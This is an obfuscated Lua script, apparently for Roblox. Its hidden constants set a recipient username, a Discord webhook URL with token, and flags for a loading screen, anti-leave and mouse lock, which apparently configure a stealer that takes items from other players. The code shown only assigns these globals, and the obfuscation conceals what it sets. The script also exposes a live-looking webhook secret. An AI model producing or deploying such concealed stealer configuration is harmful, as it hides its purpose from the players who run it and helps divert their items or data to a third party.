--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v80=0;local v81;while true do if (v80==0) then v81=v2(v0(v30,16));if v19 then local v99=v5(v81,v19);v19=nil;return v99;else return v81;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(((5 + 0) -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((790 -235) + 64)))) + (932 -(857 + 74)))) ;return v82-(v82%(569 -(367 + 201))) ;else local v83=927 -(214 + 713) ;local v84;while true do if (v83==(0 + (1065 -(68 + 997)))) then v84=(1 + 1)^(v32-(1271 -(226 + 1044))) ;return (((v31%(v84 + v84))>=v84) and ((3823 -2945) -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (119 -(32 + 85)) ;return (v36 * (251 + 5)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (7 -4) );v18=v18 + 1 + 3 ;return (v40 * 16777216) + (v39 * (66493 -(892 + 65))) + (v38 * 256) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=351 -((334 -247) + 263) ;local v44=(v20(v42,1,200 -(67 + (555 -(416 + 26))) ) * ((2 + (791 -(368 + 423)))^(78 -46))) + v41 ;local v45=v20(v42,16 + 5 ,123 -92 );local v46=((v20(v42,32)==((3042 -2089) -(345 + 457 + 150))) and  -1) or (2 -1) ;if (v45==(0 -0)) then if (v44==((0 -0) + 0)) then return v46 * (997 -(915 + 82)) ;else local v87=0 -0 ;while true do if (v87==(0 + 0)) then v45=1 -0 ;v43=0;break;end end end elseif (v45==(3234 -(1069 + (370 -252)))) then return ((v44==(0 -0)) and (v46 * (((439 -(145 + 293)) -0)/0))) or (v46 * NaN) ;end return v8(v46,v45-((196 -(10 + 8)) + 845) ) * (v43 + (v44/((3 -1)^(52 + 0)))) ;end local function v25(v47)local v48=430 -(44 + 386) ;local v49;local v50;while true do if (v48==2) then v50={};for v88=1487 -(998 + 488) , #v49 do v50[v88]=v2(v1(v3(v49,v88,v88)));end v48=1 + 2 ;end if (v48==(3 + 0)) then return v6(v50);end if (v48==(773 -((713 -512) + 571))) then v49=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;v48=2;end if ((1138 -(116 + (1881 -(814 + 45))))==v48) then v49=nil;if  not v47 then local v94=0 -0 ;while true do if (0==v94) then v47=v23();if (v47==(0 + 0)) then return "";end break;end end end v48=3 -2 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51==(780 -(162 + 618))) then v52=0 + 0 ;v53=nil;v51=1 + 0 ;end if (1~=v51) then else v54=nil;v55=nil;v51=2;end if ((3 -1)==v51) then v56=nil;v57=nil;v51=3;end if (v51==(4 -1)) then v58=nil;v59=nil;v51=1 + 3 ;end if (v51==4) then while true do if (v52==(1638 -(1373 + 263))) then local v97=1000 -(451 + 549) ;while true do if (v97~=(1 + 0)) then else v52=4 -1 ;break;end if (v97==(0 -0)) then v57=nil;v58=nil;v97=1;end end end if (v52==1) then local v98=1384 -(746 + 638) ;while true do if (v98==(1 + 0)) then v52=2 -0 ;break;end if (0==v98) then v55=nil;v56=nil;v98=342 -(218 + 123) ;end end end if (v52~=0) then else v53=0;v54=nil;v52=1582 -(1535 + 46) ;end if (v52==3) then v59=nil;while true do local v100=0;local v101;while true do if ((0 + 0)~=v100) then else v101=0;while true do if (v101==0) then if (v53==(1 + 0)) then local v120=560 -(306 + 254) ;local v121;while true do if (v120==0) then v121=0;while true do if (v121==(1 + 1)) then v53=3 -1 ;break;end if (v121==(1467 -(899 + 568))) then v58=v23();v59={};v121=1 + 0 ;end if (v121==(2 -1)) then for v133=604 -(268 + 335) ,v58 do local v134=290 -(60 + 230) ;local v135;local v136;local v137;while true do if (v134==(573 -(426 + 146))) then v137=nil;while true do if (v135==(1 + 0)) then if (v136==(1457 -(282 + 1174))) then v137=v21()~=(811 -(569 + 242)) ;elseif (v136==2) then v137=v24();elseif (v136==3) then v137=v25();end v59[v133]=v137;break;end if (v135~=0) then else local v144=0 -0 ;while true do if (v144~=(0 + 0)) then else v136=v21();v137=nil;v144=1025 -(706 + 318) ;end if (v144==1) then v135=1252 -(721 + 530) ;break;end end end end break;end if (v134==(1271 -(945 + 326))) then v135=0;v136=nil;v134=2 -1 ;end end end v57[3]=v21();v121=2 + 0 ;end end break;end end end if (2==v53) then for v125=1,v23() do local v126=0;local v127;local v128;local v129;while true do if (v126~=0) then else v127=700 -(271 + 429) ;v128=nil;v126=1 + 0 ;end if (v126==1) then v129=nil;while true do if (v127~=(1500 -(1408 + 92))) then else v128=0;v129=nil;v127=1087 -(461 + 625) ;end if (v127~=(1289 -(993 + 295))) then else while true do if (v128==(0 + 0)) then v129=v21();if (v20(v129,1172 -(418 + 753) ,1)==0) then local v138=0;local v139;local v140;local v141;local v142;while true do if (v138~=0) then else v139=0 + 0 ;v140=nil;v138=1 + 0 ;end if (v138==2) then while true do if (v139~=1) then else local v146=0 + 0 ;local v147;local v148;while true do if (v146==1) then while true do if (v147~=(0 + 0)) then else v148=0;while true do if (v148~=(530 -(406 + 123))) then else v139=1771 -(1749 + 20) ;break;end if (v148~=(0 + 0)) then else local v159=1322 -(1249 + 73) ;while true do if (v159~=1) then else v148=1 + 0 ;break;end if (v159~=(1145 -(466 + 679))) then else local v162=0 -0 ;while true do if (v162==(2 -1)) then v159=1;break;end if (v162==0) then v142={v22(),v22(),nil,nil};if (v140==0) then local v167=0;local v168;local v169;while true do if (v167==(1 + 0)) then while true do if (v168==(0 -0)) then v169=0;while true do if (v169==0) then v142[3]=v22();v142[4]=v22();break;end end break;end end break;end if (v167==(0 -0)) then local v171=114 -(4 + 110) ;while true do if (v171~=1) then else v167=585 -(57 + 527) ;break;end if (v171==0) then v168=0;v169=nil;v171=1;end end end end elseif (v140==1) then v142[3]=v23();elseif (v140==(1429 -(41 + 1386))) then v142[3]=v23() -(2^(119 -(17 + 86))) ;elseif (v140==(3 + 0)) then local v173=0 -0 ;local v174;while true do if (v173~=0) then else v174=0;while true do if (0==v174) then v142[8 -5 ]=v23() -(2^(182 -(122 + 44))) ;v142[4]=v22();break;end end break;end end end v162=1 -0 ;end end end end end end break;end end break;end if (v146~=(0 -0)) then else v147=0;v148=nil;v146=1 + 0 ;end end end if (v139~=(1 + 2)) then else if (v20(v141,5 -2 ,68 -(30 + 35) )==(1 + 0)) then v142[4]=v59[v142[4]];end v54[v125]=v142;break;end if (0==v139) then local v150=1257 -(1043 + 214) ;local v151;local v152;while true do if (1==v150) then while true do if (v151==0) then v152=0 -0 ;while true do if (v152==(1212 -(323 + 889))) then local v160=0 -0 ;while true do if (v160==(580 -(361 + 219))) then v140=v20(v129,2,3);v141=v20(v129,4,6);v160=321 -(53 + 267) ;end if (v160==(1 + 0)) then v152=414 -(15 + 398) ;break;end end end if (v152~=1) then else v139=1;break;end end break;end end break;end if (v150==0) then v151=982 -(18 + 964) ;v152=nil;v150=1;end end end if (v139==(7 -5)) then local v153=0;local v154;local v155;while true do if (v153~=0) then else v154=0;v155=nil;v153=1;end if (1==v153) then while true do if (0==v154) then v155=0;while true do if (v155==1) then v139=3;break;end if (0==v155) then local v161=0 + 0 ;while true do if (v161==(1 + 0)) then v155=1;break;end if (0~=v161) then else if (v20(v141,1,1)==1) then v142[852 -(20 + 830) ]=v59[v142[2 + 0 ]];end if (v20(v141,128 -(116 + 10) ,1 + 1 )==1) then v142[741 -(542 + 196) ]=v59[v142[3]];end v161=1;end end end end break;end end break;end end end end break;end if (v138~=1) then else local v145=0;while true do if (v145==(0 -0)) then local v156=0;while true do if (v156==1) then v145=1;break;end if (v156==0) then v141=nil;v142=nil;v156=1;end end end if ((1 + 0)~=v145) then else v138=2;break;end end end end end break;end end break;end end break;end end end for v130=1,v23() do v55[v130-(1 + 0) ]=v28();end return v57;end v101=1;end if (v101~=1) then else if (v53~=0) then else local v122=0 + 0 ;while true do if (0==v122) then v54={};v55={};v122=1;end if (v122~=(4 -2)) then else v53=2 -1 ;break;end if (v122==(1552 -(1126 + 425))) then v56={};v57={v54,v55,nil,v56};v122=1123 -(118 + 1003) ;end end end break;end end break;end end end break;end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (1==v86) then if (v79<=6) then if (v79<=2) then if (v79<=0) then v70=v78[3];elseif (v79>1) then v76[v78[2]]=v78[3];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=4) then if (v79>3) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end else v76[v78[2]]=v62[v78[3]];end elseif (v79>5) then do return;end else v76[v78[2]]=v78[3];end elseif (v79<=9) then if (v79<=7) then v62[v78[3]]=v76[v78[2]];elseif (v79>8) then v76[v78[2]][v78[3]]=v78[4];else v76[v78[2]][v78[3]]=v78[4];end elseif (v79<=11) then if (v79==10) then do return;end else v62[v78[3]]=v76[v78[2]];end elseif (v79==12) then v70=v78[3];else v76[v78[2]]=v62[v78[3]];end v70=v70 + 1 ;break;end if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O0003083O00557365724E616D6503113O004C752O66795F74726F70696E686131323303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134303436373532372O3836303439342O302F394A44556E4F75747A516D6E484A6F6C72326353376C7149416F4731454665306134743633665256436156417441766166577854704D686E41584B3033494463664B4142026O00F03F03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O01027O004003093O00416E74694C6561766503093O004D6F7573654C6F636B00183O0012023O00013O0026043O00080001000100040C3O00080001001202000100033O00120B000100023O001202000100053O00120B000100043O0012023O00063O0026043O000F0001000600040C3O000F0001001202000100033O00120B000100073O00120D000100083O00300900010009000A0012023O000B3O0026043O00010001000B00040C3O0001000100120D000100083O0030090001000C000A00120D000100083O0030090001000D000A00040C3O0017000100040C3O000100012O000A3O00017O00",v9(),...);
